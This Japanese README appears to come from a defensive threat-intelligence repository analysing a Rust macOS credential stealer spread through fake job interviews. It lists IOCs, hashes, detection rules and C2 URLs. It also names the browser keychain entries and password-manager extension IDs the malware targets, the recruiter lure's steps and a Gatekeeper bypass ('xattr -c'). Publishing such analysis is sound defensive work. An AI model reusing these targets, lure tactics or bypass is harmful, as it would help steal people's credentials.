loinekcabhlmhjjbocijdoimmejangoa  lpfcbjknijpeeillifnkikgncikgfhdo
lpilbniiabackdjcionkobglmddfbcjo  magbanejlegnbcppjljfhnmfmghialkl
mapbhaebnddapnmifbbkgeedkeplgjmf  mcbigmjiafegjnnogedioegffbooigli
mcohilncbfahbmgdjkbpemcciiolgcge  mdjjoodeandllhefapdpnffjolechflh
mdjmfdffdcmnoblignmgpommbefadffd  mdnaglckomeedfbogeajfajofmfgpoae
mfgccjchihfkkindfppnaooecgfneiii  mfiealgchgibibbamfjebflnfjihfedk
mgbfflhghaohmaecmaggieniidindaoc  mgfbabcnedcejkfibpafadgkhmkifhbd
mgffkfbidihjpoaomajlbgchddlicgpn  mjgkpalnahacmhkikiommfiomhjipgjn
mkchoaaiifodcflmbaphdgeidocajadp  mkjjflkhdddfjhonakofipfojoepfndk
mkpegjkblkkefacfnmkajcjmabijhclg  mlbnicldlpdimbjdcncnklfempedeipj
mlhakagmgkmonhdonhkpjeebfphligng  mmmjbcfofconkannjonfmjjajpllddbg
mnfifefkajgofkcjkemidiaecocnkjeh  mnnkpffndmickbiakofclnpoiajlegmg
modjfdjcodmehnpccdjngmdfajggaoeh  nanjmdknhkinifnkgdcggcfnhdaammmj
nankopfjhdflikcokhgohiaoehnjfako  nbdhibgjnjpnkajaghbffjbkcgljfgdi
nbdpmlhambbdkhkmbfpljckjcmgibalo  nebnhfamliijlghikdgcigoebonmoibm
nfaepmamdapehcbedhejbjcpnlcldodi  nfinomegcaccbhchhgflladpfbajihdf
ngakogceekkandcbkniokoghdckjhhok  nglnaekfdaelelcaokeemlnopjhekdkj
nhlnehondigmgckngjomcpcefcdplmgc  nhnkbkgjikgcigadomkphalanndcapjk
niiaamnmgebpeejeemoifgdndgeaekhe  njoljnomkdoakfphjbapdopdcneceeaf
nkbihfbeogaeaoehlefnkodbefgpgknn  nkddgncdjgjfcddamfgcmfnlhccnimig
nknhiehlklippafakaeklbeglecifhad  nlbmnnijcnlegkjjpcfjclmcfggfefdm
nlgnepoeokdfodgjkjiblkadkjbdfmgd  nopnfnlbinpfoihclomelncopjiioain
nphplpgoakhhjchkkhmiggakijnkhfnd  ocjdpmoallmgmjbbogfiiaofphbjgchh
ocjobpilfplciaddcbafabcegbilnbnb  ocmccklecaalljlflmclidjeclpcpdim
odbfpeeihdkbihmopkbjmoonfanlbfcl  oehdbmfbnjnpahadljbdcjndmepmgjgl
ofeeamlegilfbjlgbephmdhchpblfigo  ohjgojhmjldjfiningdelbffpnddmiphh
ojggmchlghnjlapmfbnjholfjkiidbch  oklkeijlcjcpbokmkmnjepjhnggkfkcl
oldojieloelkkfeacfinhcngmbkepnlm  olgpchjlegmakkhfbahgnjojlefnealp
olkbchllhcflpbjfgagahpkjnjioiedg  omaabbefbmiijedngplfjmnooppbclkk
omajpeaffjgmlpmhbfdjepdejoemifpe  onhogfjeacnfoofkfgppdlbmlmnplgbn
ooiepdgjjnhcmlaobfinbomgebfgablh  ookjlbkiijinhpmnjffcofjonbfbgaoc
opcgpfmipidbgpenhmajoajpbobppdil  oponnjpnbhdmohlkonljdfhbeibljfoa
oppceojapmdmhpnmjpballbbdclocdhj  panpgppehdchfphcigocleabcmcgfoca
pdadjkfkgcafgbceimcpbkalnfnepbnk  pdgbckgdncnhihllonhnjbdoighgpimk
pdliaogehgdbhbnmkklieghmmjkpigpa  pdlocjdlejekdbpghdcmedeacpkfiiof
peigonhbenoefaeplkpalmafieegnapj  penjlddjkjgpnkllboccdgccekpkcbin
pgiaagfkgcbnmiiolekcfmljdagdhlcm  pgojdfajgcjjpjnbpfaelnpnjocakldb
phkbamefinggmakgklpkljjmgibohnba  pmmbeeacafhbpgmlkacpadheejlhhkbf
pnndplcbkakcplkjnolgbkdgjikjednm  pnphepacpjpklpbacfmebicbgndobakn
pocmplpaccanhmnllbbkpgfliimjljgo  pogabilnghhbafaheaepaaeopjpleimd
ppbibelpcjmhbdihakflkdcoccbgbkpo  ppdadbejkmjnefldpcdjhnkpbjkikoip

スコープと制限事項

  • このリポジトリは、単一のマルウェアサンプルとその埋め込み設定の静的解析と復号を文書化しています。
  • キャンペーンの帰属は、復元されたインフラとTTPの重複に基づく分析的なものであり、法執行機関による帰属声明ではありません。
  • 記載されているChrome拡張機能のIDは、データ窃取の標的となった正規の拡張機能を特定するものであり、悪意のある拡張機能ではありません。
  • 検出ルールは、本番環境にデプロイする前に、対象環境で検証および調整する必要があります。
  • STIXバンドルはSTIX 2.1に準拠していますが、読みやすさのために簡略化されたIDを使用しています。競合を避ける必要がある場合は、本番のCTIプラットフォームにインポートする前にUUIDを再生成してください。

リリース履歴

バージョン更新についてはCHANGELOG.mdを参照してください。

貢献

ガイドライン、Issueテンプレート、PRチェックリストについてはCONTRIBUTING.mdを参照してください。

ライセンス

分析テキストとスクリプトはMITライセンスの下で公開されています。IOCリストと脅威インテリジェンスコンテンツは防御目的で提供されており、ライセンス条件に基づき商用製品での再利用が許可されています。


サンドボックス環境での独立したリバースエンジニアリング。暗号化された設定は静的解析とヘルパーごとのCPUエミュレーションによって復元されました。scripts/decrypt_all.pyとSECURITY.mdを参照してください。

ツールをダウンロード
ファイル形式目的
iocs.txtプレーンテキストハッシュ, ドメイン, URL, IP, メール, Sentry ID — ブロックリスト, MISP, OpenCTIに貼り付け
yara_rules.yarYARA 4.2+既知のサンプルハッシュマッチ + Mach-O用ヒューリスティック文字列検出
sigma_rules.ymlSigmaプロキシ, DNS, プロセス作成ルール — SIEMに合わせてlogsourceを調整
stix/bundle.jsonSTIX 2.1指標, マルウェアSDO, インフラ, ATT&CKパターン, 関係性を含む機械可読CTIバンドル
attack-navigator-layer.jsonATT&CK Navigator視覚的なテクニックカバレッジのために[ATT&CK Navigator]にインポート(https://mitre-attack.github.io/attack-navigator/)
要素詳細
プラットフォームWellfound (AngelList) — 正規の求人ボード
会社名"HyperHive" (単数形) / ドメイン hyperhives.net
ペルソナ"Felix"
連絡先メール[email protected]
信頼構築対象者の実際の履歴書、LinkedIn、特定の技術スキルを参照
口実"面接前に製品を確認してください"
ペイロード発動条件hyperhives.net で "設定 → 診断 → ログ" を確認
スケジュール設定偽の面接枠 (4月8日 15:00 UTC) で緊急性を維持
マルチステップチェーンペイロード配信前に少なくとも2日間にわたる2通のメール
プロパティ値
ファイルinstaller_binary
サイズ8,504,768 バイト
フォーマットMach-O Universal (x86_64 + arm64)
SHA-2565c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3
SHA-12de897066c2fc7db91da78d7f9ded99237345077
MD50e95ab4038ec48657563c96bed840dd5
コンパイラrustc 1.87.0 (安定版)
ビルドユーザーrootr (埋め込みパス /Users/rootr/.cargo/registry/... から)
ビルドコードネームforce
ビルドバージョン9.12.1
エラートラッキングSentry Rust SDK v0.36.0
クレート数97 (output/cargo_dependencies.txt を参照)
エンジン検出名
KasperskyHEUR:Trojan-PSW.OSX.HashBreaker.e
DrWebMac.PWS.JobStealer.1
ESET-NOD32OSX/PSW.Agent.BX Trojan
MicrosoftTrojan:MacOS/Stealer!AMTB
Avast / AVGMacOS:Stealer-BU [Trj]
ElasticMalicious (high Confidence)
CynetMalicious (score: 99)
SentinelOneStatic AI - Suspicious Mach-O
ブラウザデータパスキーチェーンエントリ
ChromeGoogle/ChromeChrome Safe Storage
BraveBraveSoftware/Brave-BrowserBrave Safe Storage
OperaデフォルトOpera Safe Storage
Opera GXデフォルトOpera Safe Storage 2023
VivaldiデフォルトVivaldi Safe Storage
Microsoft EdgeデフォルトMicrosoft Edge Safe Storage
ArcArc/User Data—
CocCocデフォルトCocCoc Safe Storage
製品拡張機能ID(例)
1Passwordaeblfdkhhhdcdjpifhhbdiojplfjncoa, khgocmkkpikpnmmkgmdnfckapcdkgfaf, gejiddohjgogedgjnonbofjigllpkmbf
ProtonPassghmbeldphafepmbegfdlkpapadhbakde
Dashlanefdjamakpfbbddfjaooikfcpapjohcfmg
Deloitte Credentials企業認証情報ストア
force_mode
Gatekeeperバイパスダウンロードしたバイナリに対して xattr -c
VPN認識"VPNを使用して再試行してください" エラーメッセージ
https://cloudproxy.link/m/decode命令 / 設定チャネル
https://cloudproxy.link/db/debugデバッグ / 診断